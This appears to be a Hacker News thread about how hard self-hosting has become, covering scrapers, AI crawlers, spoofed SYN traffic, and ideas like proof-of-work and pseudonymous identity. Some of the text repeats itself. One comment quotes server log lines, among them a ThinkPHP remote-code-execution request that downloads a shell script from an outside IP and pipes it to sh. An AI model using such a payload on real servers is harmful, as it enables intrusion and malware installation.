> The internet is no longer a safe haven for software hobbyists
Maybe I've just had bad luck, but since I started hosting my own websites back around 2005 or so, my servers have always been attacked basically from the moment they come online. Even more so when you attach any sort of DNS name to it, especially when you use TLS and the certificates, guessing because they end up in a big index that is easily accessible (the "transparency logs"). Once you start sharing your website, it again triggers an avalanche of bad traffic, and the final boss is when you piss of some organization and (I'm assuming) they hire some bad actor to try to make you offline.
Dealing with crawlers, bot nets, automation gone wrong, pissed of humans and so on have been almost a yearly thing for me since I started deploying stuff to the public internet. But again, maybe I've had bad luck? Hosted stuff across wide range of providers, and seems to happen across all of them.
My stuff used to get popped daily. A janky PHP guestbook I wrote just to learn back in the early 2000s? No HTML injection protection & someone turned my site into spammy XSS hack within days. A WordPress installation I fell behind on patching? Turned into SEO spam in hours. A redis instance I was using just to learn some of their data structures that got accidentally exposed to the web? Used to root my computer and install a botnet RAT. This was all before 2020.
I never felt this made the internet "unsafe". Instead, it just reminded me how I messed up. Every time, I learned how to do better, and I added more guardrails. I haven't gotten popped that obviously in a long time, but that's probably because I've acted to minimize my public surface area, used star-certs to avoid being in the cert logs, added basic auth whenever I can, and generally refused to _trust_ software that's exposed to the web. It's not unsafe if you take precautions, have backups, and are careful about what you install.
If you want to see unsafe, look at how someone who doesn't understand tech tries to interact with it. Downloading any random driver or exe to fix a problem, installing apps when a website would do, giving Facebook or Tiktok all of their information and access without recognizing that just maybe these multi-billion-dollar companies who give away all of their services don't have your best interests in mind.
Hosting a WP with any amount of by script kiddies written third-party plugins without constant vigilance and keeping things up to date is a recipe for disaster. This makes it a job guarantee. Hapless people paying for someone to set up a hopelessly over-complicated WP setup, paying for lots of plugins, and constant upkeep. Basically, that ecosystem feeds an entire community of "web developers" by pushing badly written software, that then endlessly needs to be patched and maintained. Then the feature creep sets in and plugins stray from the path of doing one thing well, until even WP instance maintainers deem them too bloated and look for a simpler one. Then the cycle begins anew.
I really like how you take these situations and turn them into learning moments, but ultimately what you’re describing still sounds like an incredibly hostile space. Like yeah everyone should be a defensive driver on the road, but we still acknowledge that other people need to follow the rules instead of forcing us to be defensive drivers all the time.
My first ever deployed project was breached on day 1 with my database dropped and a ransom note in there.
Was a beginner mistake by me that allowed this, but it's pretty discouraging. Its not the internet that sucks, its people that suck.
I have been using zipbombs and they were effective to some extent. Then I had the smart idea to write about it on HN [0]. The result was a flood of new types of bots that overwhelmed my $6 server. For ~100k daily request, it wasn't sustainable to serve 1 to 10MB payloads.
I've updated my heuristic to only serve the worst offenders, and created honeypots to collect ips and repond with 403s. After a few months, and some other spam tricks I'll keep to myself this time, my traffic is back to something reasonable again.
My Gitea instance also encountered aggressive scraping some days ago, but with highly distributed IP & ASN & geolocation, each of which is well below the rate of a human visitor. I assume Anubis will not stop the massively funded AI companies, so I'm considering poisoning the scrapers with garbage code, only targeting blind scrapers, of course.
Sadly we're now seeing services that sell proxy services that allows you to scape from a wide variety of residential IPs, some even goes so far as to labels their IPs as "ethically sources".
Anubis is definitely playing the cat-and-mouse game to some extent, but I like what it does because it forces bots to either identify themselves as such or face challenges.
That said, we can likely do better. Cloudflare does good in part because Cloudflare runs so much traffic, so they have a lot of data across the internet. Smaller operators just don't get enough traffic to really deal with banning abusive IPs without banning entire ranges indefinitely, not ideal. I hope to see a solution like Crowdsec where reputation data can be crowdsourced to block known bad bots (at least for a while since they are likely borrowing IPs) while using low complexity (potentially JS-free) challenges for IPs with no bad reputation. It's probably too much to ask for Anubis upstream which is probably already too busy dealing with the challenges of what it already does at the scale it is operating, but it does leave some room for further innovation for whoever wants to go for it.
In my opinion there is at least no reason why it is not plausible to have a drop-in solution that can mostly resolve these problems and make it easier for hobbyists to run services again.
I do not have a solution for blog like this but if you are self hosting I recommend enabling mTLS on your reverse proxy.
I'm doing this for a dozen services hosted at home. The reverse proxy just drops the request if user does not present a certificate. My devices which can present cert can connect seamlessly. It's a one time setup but once done you can forget about it.
That's fine if you're hosting stuff just for yourself but not really practical if you're hosting stuff you want others to be able to read, such as a blog.
You can mTLS to CloudFlare too, if you’re not one of the anti-CloudFlare people. Then all traffic drops besides traffic that passes thru CF and the mTLS handshake prevents bypassing CF.
> Fail2ban was struggling to keep up: it ingests the Nginx access.log file to apply its rules but if the files keep on exploding…
> [...]
> But I don’t want to fiddle with even more moving components and configuration
Since I moved my DNS records to Cloudflare (that is: nameserver is now the one from Cloudflare), I get tons of odd connections, most notably SYN packets to eihter 443 or 22, which never respond back after the SYN-ACK. They ping me once a second in average, distributing the IPs over a /24 network.
I really don't understand why they do this, and it's mostly some shady origins, like vps game server hoster from Brazil and so on.
I'm at the point where i capture all the traffic and looks for SYN packets, check the RDAP records for them to decide if I then drop the entire subnets of that organization, whitelisting things like Google.
Digital Ocean is notoriously a source of bad traffic, they just don't care at all.
> like vps game server hoster from Brazil and so on.
Probably someone DDoSing a Minecraft server or something.
People in games do this where they DDoS each other. You can get access to a DDoS panel for as little as $5 a month.
Some providers allow for spoofing the src ip, that's how they do these reflection attacks. So you're not actually dropping the sender of these packets, but the victims.
These are spoofed packets for SYNACK reflection attacks. Your response traffic goes to the victim, and since network stacks are usually configured to retry SYNACK a few times, they also get amplification out of it
I wonder if you can have a chain of "invisible" links on your site that a normal person wouldn't see or click.
The links can go page A -> page B -> page C, where a request for C = instant IP ban.
I self host and I have something like this but more obvious: i wrote a web service that talks to my mikrotik via API and add the IP of the requester to the block list with a 30 day timeout (configurable ofc). It hostname is "bot-ban-me.myexamplesite.com" and it is like a normal site in my reverse proxy. So when I request a cert this hostname is in the cert, and in the first few minutes i can catch lots of bad apples. I do not expect anyone to ever type this. I do not mention the address or anything anywhere, so the only way to land there is to watch the CT logs.
We do something similar for ssh. If a remote connection tries to log in as "root" or "admin" or any number of other usernames that indicate a probe for vulnerable configurations, that's an insta-ban for that IP address (banned not only for SSH but for everything).
Scrapers nowadays can use residential and mobile IPs, so banning by IP, even if actual malicious requests are coming from them, can also prevent actual unrelated people from accessing your service.
Unless you're running a very popular service, unlikely that a random residential IP would be both compromised by a malicious VPN and also trying to access your site legitimately.
There was an article just yesterday which detailed doing this as not in order to ban but in order to waste time. You can also zip bomb people which is entertaining but probably not super effective.
I very much relate to the author's sour mood and frustration. I also host a small hobby forum and have experienced the same attacks constantly, and it has gotten especially bad the last couple of years with the rise of AI.
In the early days I put Google Analytics on the site so I could observe traffic trends. Then, we were all forced to start adding certificates to our sites to keep them "safe".
While I think we're all doomed to continue that annual practice or get blocked by browsers, I have often considered removing Google Analytics. Ever since their redesign it is essentially unusable for me now. What benefit does it bring if I can't understand the product anymore?
Last year, in a fit of desperation, I added Cloudflare. This has a brute force "under attack" mode that seems to stop all bots from accessing the site. It puts up a silly "hang on a second, are you human" page before the site loads, but it does seem to work. It is great UX? No, but at least the site isn't getting hammered by various locations in Asia. Cloudflare also let me block entire countries, although that seems to be easily fooled.
I also don't think a lot of the bots/AI crawlers honor the rules set in the robots.txt. It's all an honor system anyway, and they are completely lacking in it.
There need to be some hard and fast rules put in place, somehow, to stop the madness.
I wonder if a proof of work protocol is a viable solution. To GET the page, you have to spend enough electricity to solve a puzzle. The question is whether the threshold could be low enough for typical people on their phones to access the site easily, but high enough that mass scraping is significantly reduced.
Thanks for these references! I imagine the numbers would be entirely different in our context (20 years later and web serving, not email sending). And the idea of spammers using bot nets (therefore not paying for computer themselves) would be less relevant to LLM scraping. But I’ll try to check for forward references on these.
I feel like it could work. If you think about it, you need the cost to the client to be greater than the cost to the server. As long as that is true the server shouldn't mind about increased traffic because it's making a profit!
Very crudely if you think that a request costs the server ~10ms of compute time and a phone is 30x slower then you'd need 300ms of client compute time to equal it which seems very reasonable.
The only problem is you would need a cryptocurrency that a) lets you verify tiny chunks of work, and b) can't be done faster than you can do it on a phone using other hardware, and c) lets a client mine money without being to actually spend it ("homomorphic mining"?).
I don't know if anything like that exists but it would be an interesting problem to solve.
> Other things I’ve noticed is increased traffic with Referer headers coming from strange websites such as bioware.com, mcdonalds.com, and microsoft.com
I've been seeing this too, I guess scrapers think they can get through some blockers with a referrer?
I wonder why is it that we get an increase in these automated scrapers and attacks as of late (some few years); is there better (open-source?) technology that allows it? Is it because hosting infrastructure is cheaper also for the attackers? Both? Something else?
Maybe the long-term solution for such attacks is to hide most of the internet behind some kind of Proof of Work system/network, so that mostly humans get to access to our websites, not machines.
What's missing is effective international law enforcement. This is a legal problem first and foremost. As long as it's as easy as it is to get away with this stuff by just routing the traffic through a Russian or Singaporean node, it's going to keep happening. With international diplomacy going the way it has been, odds of that changing aren't fantastic.
The web is really stuck between a rock and a hard place when it comes to this. Proof of work helps website owners, but makes life harder for all discovery tools and search engines.
An independent standard for request signing and building some sort of reputation database for verified crawlers could be part of a solution, though that causes problems with websites feeding crawlers different content than users, an does nothing to fix the Sybil attack problem.
This is already kind of true with every global website, the idea of a single global internet is one of those fairy tale fantasy things, that maybe happened for a little bit before enough people used it. In many cases it isn't really ideal today.
Good points; I would definitely vouch for an independent standard for request signing + some kind of decentralized reputation system. With international law enforcement, I think there could be too many political issues for it not become corrupt
I don’t think this can solved legally without compromising anonymity. You can block unrecognized clients and punish the owners of clients that behave badly, but then, for example, an oppressive government can (physically) take over a subversive website and punish everyone who accesses it.
Maybe pseudo-anonymity and “punishment” via reputation could work. Then an oppressive government with access to a subversive website (ignoring bad security, coordination with other hijacked sites, etc.) can only poison its clients’ reputations, and (if reputation is tied to sites, who have their own reputations) only temporarily.
> but then, for example, an oppressive government can (physically) take over a subversive website and punish everyone who accesses it.
Already happens. Oppressive governments already punish people for visiting "wrong" websites. They already censor internet.
There are no technological solutions to coordination problems. Ultimately, no matter what you invent, it's politics that will decide how it's used and by whom.
It's not necessarily going through a Russian or Singaporean node though, on the sites I'm responsible for, AWS, GCP, Azure are in the top 5 for attackers. It's just that they don't care _at all_ about that happening.
I don't think you need world-wide law-enforcement, it'll be a big step ahead if you make owners & operators liable. You can limit exposure so nobody gets absolutely ruined, but anyone running wordpress 4.2 and getting their VPS abused for attacks currently has 0 incentive to change anything unless their website goes down. Give them a penalty of a few hundred dollars and suddenly they do. To keep things simple, collect from the hosters, they can then charge their customers, and suddenly they'll be interested in it as well, because they don't want to deal with that.
The criminals are not held liable, and neither are their enablers. There's very little chance anything will change that way.
The big cloud provides needs to step up and take responsibility. I understand that it can't be to easy to do, but we really do need a way to contact e.g. AWS and tell them to shut of a costumer. I have no problem with someone scraping our websites, but I care that they don't do so responsibly, slow down when we start responding slower, don't assume that you can just go full throttle, crash our site, wait, and then do it again once we start responding again.
You're absolutely right: AWS, GCP, Azure and others, they do not care and especially AWS and GCP are massive enablers.
I'm pretty sure it is the commercial demand for data from AI companies. It is certainly the popular conception among sysadmins that it is AI companies who are responsible for the wave of scrapers over the past few years, and I see no compelling alternative.
Another potential cause: It's way easier for pretty much any person connected to the internet to "create" their own automation software by using LLMs. I could wager even the less smart LLMs could handle "Create a program that checks this website every second for any product updates on all pages" and give enough instructions for the average computer user to be able to run it without thinking or considering much.
Multiply this by every person with access to an LLM who wants to "do X with website Y" and you'll get an magnitude increase in traffic across the internet. This been possible since what, 2023 sometime? Not sure if the patterns would line up, but just another guess for the cause(s).
Attached to IP address is easiest to grok, but wouldn't work well since addresses lack affinity. OK, so we introduce an identifier that's persistent, and maybe a user can even port it between devices. Now it's bad for privacy. How about a way a client could prove their reputation is above some threshold without leaking any identifying information? And a decentralized way for the rest of the internet to influence their reputation (like when my server feels you're hammering it)?
Do anti-DDoS intermediaries like Cloudflare basically catalog a spectrum of reputation at the ASN level (pushing anti-abuse onus to ISP's)?
This is basically what happened to email/SMTP, for better or worse :-S.
20+ years ago there were mail blacklists that basically blocked residential IP blocks as there should not be servers trying to send normal mail from there. Now you must try the opposite, blacklist blocks where only servers and not end users can come from, as there is potentially bad behaved scrapers in all major clouds and server hosting platforms.
But then there are residential proxies that pay end users to route requests from misbehaved companies, so that door is also a bad mitigation
It's interesting that along another axis, the inertia of the internet moved from a decentralized structure back toward something that resembles mainframes. I don't think those axes are orthogonal.
Reputation plus privacy is probably unsolvable; the whole point of reputation is knowing what people are doing elsewhere. You don’t need reputation, you need persistence. You don’t need to know if they are behaving themselves elsewhere on the Internet as long as you can ban them once and not have them come back.
Services need the ability to obtain an identifier that:
- Belongs to exactly one real person.
- That a person cannot own more than one of.
- That is unique per-service.
- That cannot be tied to a real-world identity.
- That can be used by the person to optionally disclose attributes like whether they are an adult or not.
Services generally don’t care about knowing your exact identity but being able to ban a person and not have them simply register a new account, and being able to stop people from registering thousands of accounts would go a long way towards wiping out inauthentic and abusive behaviour.
The ability to “reset” your identity is the underlying hole that enables a vast amount of abuse. It’s possible to have persistent, pseudonymous access to the Internet without disclosing real-world identity. Being able to permanently ban abusers from a service would have a hugely positive effect on the Internet.
A digital "Death penalty" is not a win for society, without considering a fair way to atone for "crimes against your digital identity".
It would be way to easy for the current regime (whomever that happens to be) to criminalize random behaviors (Trans People? Atheists? Random nationality?) to ban their identity, and then they can't apply for jobs, get bus fare, purchase anything online, communicate with their lawyers, etc.
Describing “I don’t want to provide service to you and I should have the means of doing so” as a “digital death penalty” is a tad hyperbolic, don’t you think?
> It would be way to easy for the current regime (whomever that happens to be) to criminalize random behaviors (Trans People? Atheists? Random nationality?) to ban their identity, and then they can't apply for jobs, get bus fare, purchase anything online, communicate with their lawyers, etc.
Authoritarian regimes can already do that.
I think perhaps you might’ve missed the fact that what I was suggesting was individual to each service:
> Reputation plus privacy is probably unsolvable; the whole point of reputation is knowing what people are doing elsewhere. You don’t need reputation, you need persistence. You don’t need to know if they are behaving themselves elsewhere on the Internet as long as you can ban them once and not have them come back.
I was saying don’t care about what people are doing elsewhere on the Internet. Just ban locally – but persistently.
If creating an identity has a cost, then why not allow people to own multiple identities? Might help on the privacy front and address the permadeath issue.
Of course everything sounds plausible when speaking at such a high level.
I agree and think the ability to spin up new identities is crucial to any sort of successful reputation system (and reflects the realities of how both good and bad actors would use it). Think back to early internet when you wanted an identity in one community (e.g. forums about games you play) that was separate from another (e.g. banking). But it means those reputation identities need to take some investment (e.g. of time / contribution / whatever) to build, and can't become usefully trusted until reaching some threshold.
Because of course what this world needs is for the wealthy to have even more advantages over the normies. (Hint: If you're reading this, and think you're one of the wealthy ones, you aren't)
I guess it is just because 1) They can, and 2) Everyone wants some data. I think it would be interesting if every website out there starts to push out BS pages just for scrappers. Not sure how much extra cost it's going to take if a website puts up say 50% BS pages that only scrappers can reach, or BS material with extremely small fonts hidden in regular pages that ordinary people cannot see.
Why? It’s because of AI. It enables attacks at scale. It enables more people to attack, who previously couldn’t. And so on.
It’s very explainable. And somehow, like clockwork, there are always comments to say “there is nothing new, the Internet has always been like this since the 80s”.
You know, part of me wants to see AI proliferate into more and more areas, just so these people will finally wake up eventually and understand there is a huge difference when AI does it. When they are relentlessly bombarded with realistic phone calls from random numbers, with friends and family members calling about the latest hoax and deepfake, when their own specific reputation is constantly attacked and destroyed by 1000 cuts not just online but in their own trusted circles, and they have to put out fires and play whack-a-mole with an advanced persistent threat that only grows larger and always comes from new sources, anonymous and not.
And this is all before bot swarms that can coordinate and plan long-term, targeting specific communities and individuals.
And this is all before humanoid robots and drones proliferate.
Just try to fast-forward to when human communities online and offline are constantly infiltrated by bots and drones and sleeper agents, playing nice for a long time and amassing karma / reputation / connections / trust / whatever until finally doing a coordinated attack.
Honestly, people just don’t seem to get it until it’s too late. Same with ecosystem destruction — tons of people keep strawmanning it as mere temperature shifts, even while ecosystems around the world get destroyed. Kelp forests. Rainforests. Coral reefs. Fish. Insects. And they’re like “haha global warming by 3 degrees big deal. Temperature has always changed on the planet.” (Sound familiar?)
Look, I don’t actually want any of this to happen. But if they could somehow experience the movie It’s a Wonderful Life or meet the Ghost of Christmas Yet to Come, I’d wholeheartedly want every denier to have that experience. (In fact, a dedicated attacker can already give them a taste of this with current technology. I am sure it will become a decentralized service soon :-( )
Our tech overlords understand AI, especially any form of AGI, will basically be the end of humanity. That’s why they’re entirely focused on being the first and amassing as much wealth in the meanwhile, giving up on any sort of consideration whether they’re doing good for people or not.
Unpopular opinion: the real source of the problem is not scrapers, but your unoptimized web software. Gitea and Fail2ban are resource hogs in your case, either unoptimized or poorly configured.
My tiny personal web servers can whistand thousands of requests per second, barely breaking a sweat. As a result, none of the bots or scrapers are causing any issue.
"The only thing that had immediate effect was sudo iptables -I INPUT -s 47.79.0.0/16 -j DROP" Well, by blocking an entire /16 range, it is this type of overzealous action that contributes to making the internet experience a bit more mediocre. This is the same thinking that lead me to, for example, not being able to browse homedepot.com from Europe. I am long-term traveling in Europe and like to frequent DIY websites with people posting links to homedepot, but no someone at HD decided that European IPs couldn't access their site, so I and millions of others are locked out. The /16 is an Alibaba AS, and you make the assumption that most of it is malicious, but in reality you don't know. Fix your software, don't blindly block.
sad but hosting static content like his site in a cloud would save him headache. i know i know must "do it yourself" but if that is his path he knows the price. maybe i am wrong and do not understand the problem but it seems like asking for a headache.
I think the author would agree, and is in fact the point of his post.
The only way to solve these problems is using some large hosted platform where they have the resources to constantly be managing these issues. This would solve their problem.
But isn't it sad that we can't host our own websites anymore, like many of us used to? It was never easy, but it's nearly impossible now and this is only one reason.
i think it has been a hard to host a site since about 2007. i stopped then because it is too much work to keep it safe. even worse now but it has always been extra work since search engines. maybe the OP is just getting older and wants to spend time with his kids and not play with nginx haha.
I run a dedicated firewall/dns box with netfilter rules to rate limit new connections per IP. It looks like I may need to change that to rate limit per /16 subnet...
The Internet has really been an interesting case study for what happens between people when you remove a varying number of layers of social control.
All the way back to the early days of Usenet really.
I would hate to see it but at the same time I feel like the incentives created by the bad actors really push this towards a much more centralized model over time, e.g. one where all traffic provenance must be signed and identified and must flow through a few big networks that enforce laws around that.
"Socialists"* argue for more regulations; "liberals" claim that there should be financial incentives to not do that.
I'm neither. I believe that we should go back to being "tribes"/communities. At least it's a time-tested way to – maybe not prevent, but somewhat allieviate – the tragedy of the commons.
(I'm aware that this is a very poor and naive theory; I'll happily ditch it for a better idea.)
The problem with anything, anything, without a centralized authority, is that friction overwhelms inertia. Bad actors exist and have no mercy, while good people downplay them until it’s too late. Entropy always wins. Misguided people assume the problem is powerful people, when the problem is actually what the powerful people use their authority to do, as powerful people will always exist. Accepting that and maintaining oversight is the historically successful norm; abolishing them has always failed.
As such, I don’t identify with the author of this post, about trying to resist CloudFlare for moral reasons. A decentralized system where everyone plays nice and mostly cooperates, does not exist any more than a country without a government where everyone plays nice and mostly cooperates. It’s wishful thinking. We already tried this with Email, and we’re back to gatekeepers. Pretending the web will be different is ahistorical.
The internet has made the world small and that's a problem. Nation states typically had a limited range of broadcasting their authority in the more distant past. A bad ruler couldn't rule the entire world, nor could they cause trouble with the entire world. From nukes to the interconnected web the worst of us with power can effect everyone else.
Power is a spectrum. Power differentials will always exist but we can absolutely strive to make them smaller and smaller.
1) Most of the civilized world no longer has hereditary dictators (such as "kings"). Because they were removed from power by the people and the power was distributed among many individuals. It works because malicious (anti-social) individuals have trouble working together. And yes, oversight helps.
But it's a spectrum and we absolutely can and should move the needle towards more oversight and more power distribution.
2) Corporate power structures are still authoritarian. We can change that too.
The Internet was a scene, and like all scenes it's done now the corpos have moved in and taken over (because at that point it's just ads and rent extraction in perpetuity). I dunno what/where/when the next tech scene will be, but I do know it's not going to come from Big Tech. See: Metaverse.
The magical times in the past have always been marked with being able to be part of an "exclusive club" that takes something from nothing to changing the world.
Because of the internet, magical times can never be had again. You can invent something new, but as soon as anyone finds out about it, everyone now finds out about it. The "exclusive club" period is no more.
Yes, they can. But we need to admit to ourselves that people are not equal. Not just in terms of skill but in terms of morality and quality of character. And that some people are best kept out.
Corporations, being amoral, should also be kept out.
---
The old internet was the way it was because of gate keeping - the people on it were selected through technical skill being required. Generally people who are builder types are more pro-social than redistributor types.
Any time I've been in a community which felt good, it was full of people who enjoyed building stuff.
Any time such a community died, it was because people who crave power and status took it over.
There is no something new. Anything we invent will be able to be taken over by complex bots. Welcome to the futureshock where humans aren't at the top of their domain.
Gopher still requires the Internet. I know it's pretty common to conflate "the Internet" with "the World Wide Web", but there are actually other protocols out there (like Gopher).
The internet hasn't been a safe haven since the 80s, or maybe earlier (that was before my time, and it's never been one since I got online in the early 90s).
The only real solution is to implement some sort of identity management system, but that has so many issues that make it a non-starter.
The governments like it that way. They want banks and tech companies to be intermediaries that are more difficult to hold accountable, because they can just say “we didn’t feel like doing business with this person”.
What do you mean by that? Web pages is the central mechanism, we use to put information on the web. Of course many websites are shitty and could be much simpler to convey their information, without looking crap at all. But the web page in general? Why would we ever get rid of something so useful? And what do you suggest as an alternative?
Common man never had a need for internet or global connectedness. DARPA wanted to push technology to gain upper hand in the world matters. Universities pushed technology to show progress and sell research. Businesses pushed technologies to have more sales. It was kind of acid rain that was caused by the establishments and sold as scented rain.
This sentiment - along the lines of "the world became too dependent on the Internet", "Internet wasn't a good thing to begin with", "Internet is a threat to national security" etc - has been popping up on HN too often lately, emerged too abruptly and correlates with the recent initiatives to crack down on the Internet too well.
If this is your own opinion and not a part of a psyop to condition people into embracing the death of the Internet as we know it, do you have any solution to propose?
You don't need to have a solution to explore a problem in my opinion. OP comment is problematic but for reasons other than not having a proposed solution.
> Common man never had a need for internet or global connectedness
That's not how culture evolves. You don't necessarily need to have a problem so that a solution is developed. You can very well have a technology developed for other purposes, or just for exploration sake, and then as this tech exists uses for it start to pop post hoc.
You therefore ignore the immense benefit of access to information that technology has, something that wasn't necessarily a problem for the common man but once its there, the popularization of the access to information, they adapt and grow dependent on it. Just like electricity.
People with dialup telephones never asked for a smartphone connected to internet. They were just as happy back then or even more happy because phone didn't eat off their time or cause posture problems.
Sure, shopping was slower without amazon website, but not less happy experience back then. Infact homes had less junk and people saved more money
Messaging? sure it makes you spend time with 100 whatsapp groups, where 99% of the people don't know you personally.
It helped companies to sell more of the junk more quickly.
It created bloggers and content creators who lived in an imaginary world thinking that someone really consumes their content.
It created karma beggers who begged globally for likes that are worth nothing.
It created more concentration of wealth at some weird internet companies, which don't solve any of the world problems or basic needs of the people.
And finally it created AI that pumps plastic sewage to fill the internet. There it is, your immensely useful internet.
As if the plastic pollution was not enough in the real world, the internet will be filled with plastic content.
What else did internet give that is immensely helpful?
> The internet is no longer a safe haven for software hobbyists
Maybe I've just had bad luck, but since I started hosting my own websites back around 2005 or so, my servers have always been attacked basically from the moment they come online. Even more so when you attach any sort of DNS name to it, especially when you use TLS and the certificates, guessing because they end up in a big index that is easily accessible (the "transparency logs"). Once you start sharing your website, it again triggers an avalanche of bad traffic, and the final boss is when you piss of some organization and (I'm assuming) they hire some bad actor to try to make you offline.
Dealing with crawlers, bot nets, automation gone wrong, pissed of humans and so on have been almost a yearly thing for me since I started deploying stuff to the public internet. But again, maybe I've had bad luck? Hosted stuff across wide range of providers, and seems to happen across all of them.
My stuff used to get popped daily. A janky PHP guestbook I wrote just to learn back in the early 2000s? No HTML injection protection & someone turned my site into spammy XSS hack within days. A WordPress installation I fell behind on patching? Turned into SEO spam in hours. A redis instance I was using just to learn some of their data structures that got accidentally exposed to the web? Used to root my computer and install a botnet RAT. This was all before 2020.
I never felt this made the internet "unsafe". Instead, it just reminded me how I messed up. Every time, I learned how to do better, and I added more guardrails. I haven't gotten popped that obviously in a long time, but that's probably because I've acted to minimize my public surface area, used star-certs to avoid being in the cert logs, added basic auth whenever I can, and generally refused to _trust_ software that's exposed to the web. It's not unsafe if you take precautions, have backups, and are careful about what you install.
If you want to see unsafe, look at how someone who doesn't understand tech tries to interact with it. Downloading any random driver or exe to fix a problem, installing apps when a website would do, giving Facebook or Tiktok all of their information and access without recognizing that just maybe these multi-billion-dollar companies who give away all of their services don't have your best interests in mind.
Hosting a WP with any amount of by script kiddies written third-party plugins without constant vigilance and keeping things up to date is a recipe for disaster. This makes it a job guarantee. Hapless people paying for someone to set up a hopelessly over-complicated WP setup, paying for lots of plugins, and constant upkeep. Basically, that ecosystem feeds an entire community of "web developers" by pushing badly written software, that then endlessly needs to be patched and maintained. Then the feature creep sets in and plugins stray from the path of doing one thing well, until even WP instance maintainers deem them too bloated and look for a simpler one. Then the cycle begins anew.
I really like how you take these situations and turn them into learning moments, but ultimately what you’re describing still sounds like an incredibly hostile space. Like yeah everyone should be a defensive driver on the road, but we still acknowledge that other people need to follow the rules instead of forcing us to be defensive drivers all the time.
I have very similar experience. In my Nginx logs, I see things like that on a regular basis:
79.124.40.174 - - [16/Nov/2025:17:04:52 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 555 "http://142.93.104.181:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" ... 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\xF7:\xB4]D\x0C\xD0?\xEF~\xAC\xF8\x8C\x80us\xB8=\x0F\x9C\xA8\xC1\xDD\xC4\xDF2\x8CQC\x18\xDC\x1D \xD0{\xC9\x01\xEC\x227\xCB9\xBE\x8C\xE0\xB2\x9F\xCF\x97\xF6\xBE\x88z/\xD7;\xB1\x8C\xEEu\x00\xBF]<\x92\x00" 400 157 "-" "-" "-" 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\x8A\xB5\xA4)n\x10\x8CO(\x99u\xD8\x13\x0B\xB7h7\x16\xC5[\x85<\xD3\xDC\x9C\xAB\x89\xE0\x0B\x08a\xDE \x9F2Z\xCD\xD1=\x9B\xBAU1\xF3h\xC1\xEEY<\xAEuZ~2\x81Cg\xFD\x87\x84\xA3\xBA:$\xC8\x00" 400 157 "-" "-" "-"
or:
"192.159.99.95 - - [16/Nov/2025:13:44:03 +0000] "GET /public/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 301 169 "-" "Mozilla/5.0 (bang2013@atomicmail.io)" "-"
These are just some examples, but they happen pretty much daily :(
I remember watching the code red signatures in my space logs on my desktop back in 2001
> my servers have always been attacked
I believe the correct verb is monetised.
My first ever deployed project was breached on day 1 with my database dropped and a ransom note in there. Was a beginner mistake by me that allowed this, but it's pretty discouraging. Its not the internet that sucks, its people that suck.
Well I guess at least on day 1 you didn’t have much to lose!
Its a personal blog so even if data was lost it would've been just posts that nobody reads. Certainly not worth the 0.00054 BTC they wanted
Scrapers have constantly been running against my cgit server for the past year, but they're bizarrely polite in my case... 2-3 requests per minute.
This whole enterprise is clearly run by exceptionally dumb people, since you can just clone all the code I host there directly from upstreams...
I have been using zipbombs and they were effective to some extent. Then I had the smart idea to write about it on HN [0]. The result was a flood of new types of bots that overwhelmed my $6 server. For ~100k daily request, it wasn't sustainable to serve 1 to 10MB payloads.
I've updated my heuristic to only serve the worst offenders, and created honeypots to collect ips and repond with 403s. After a few months, and some other spam tricks I'll keep to myself this time, my traffic is back to something reasonable again.
[0]: https://news.ycombinator.com/item?id=43826798
There's likely a large market for this kind of thing. Maybe time to spin out a side business and deploy your heuristics to struggling IPs.
Though I have to admit I dont know who your target audience would be. Self-hosting orgs don't tend to be flush with cash
My Gitea instance also encountered aggressive scraping some days ago, but with highly distributed IP & ASN & geolocation, each of which is well below the rate of a human visitor. I assume Anubis will not stop the massively funded AI companies, so I'm considering poisoning the scrapers with garbage code, only targeting blind scrapers, of course.
Sadly we're now seeing services that sell proxy services that allows you to scape from a wide variety of residential IPs, some even goes so far as to labels their IPs as "ethically sources".
Anubis is definitely playing the cat-and-mouse game to some extent, but I like what it does because it forces bots to either identify themselves as such or face challenges.
That said, we can likely do better. Cloudflare does good in part because Cloudflare runs so much traffic, so they have a lot of data across the internet. Smaller operators just don't get enough traffic to really deal with banning abusive IPs without banning entire ranges indefinitely, not ideal. I hope to see a solution like Crowdsec where reputation data can be crowdsourced to block known bad bots (at least for a while since they are likely borrowing IPs) while using low complexity (potentially JS-free) challenges for IPs with no bad reputation. It's probably too much to ask for Anubis upstream which is probably already too busy dealing with the challenges of what it already does at the scale it is operating, but it does leave some room for further innovation for whoever wants to go for it.
In my opinion there is at least no reason why it is not plausible to have a drop-in solution that can mostly resolve these problems and make it easier for hobbyists to run services again.
I do not have a solution for blog like this but if you are self hosting I recommend enabling mTLS on your reverse proxy.
I'm doing this for a dozen services hosted at home. The reverse proxy just drops the request if user does not present a certificate. My devices which can present cert can connect seamlessly. It's a one time setup but once done you can forget about it.
That's fine if you're hosting stuff just for yourself but not really practical if you're hosting stuff you want others to be able to read, such as a blog.
You can mTLS to CloudFlare too, if you’re not one of the anti-CloudFlare people. Then all traffic drops besides traffic that passes thru CF and the mTLS handshake prevents bypassing CF.
Everything good enough to become popular gets swarmed by the teeming masses and then exploited and destroyed.
The only solution seems to be to constantly abandon those things and move on to new frontiers to enjoy until the cycle repeats.
Since I moved my DNS records to Cloudflare (that is: nameserver is now the one from Cloudflare), I get tons of odd connections, most notably SYN packets to eihter 443 or 22, which never respond back after the SYN-ACK. They ping me once a second in average, distributing the IPs over a /24 network.
I really don't understand why they do this, and it's mostly some shady origins, like vps game server hoster from Brazil and so on.
I'm at the point where i capture all the traffic and looks for SYN packets, check the RDAP records for them to decide if I then drop the entire subnets of that organization, whitelisting things like Google.
Digital Ocean is notoriously a source of bad traffic, they just don't care at all.
> like vps game server hoster from Brazil and so on.
Probably someone DDoSing a Minecraft server or something.
